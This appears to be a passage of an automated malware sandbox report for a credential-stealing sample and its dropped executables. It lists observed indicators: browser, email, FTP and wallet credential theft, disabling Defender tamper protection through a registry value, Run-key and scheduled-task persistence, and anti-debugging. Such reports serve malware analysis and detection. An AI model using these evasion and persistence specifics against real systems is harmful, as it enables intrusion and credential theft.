N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dbcb8133.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\32dbcb8133.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3c485884af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091759001\\3c485884af.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\759b6f5ccf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091760001\\759b6f5ccf.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848770725900965" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
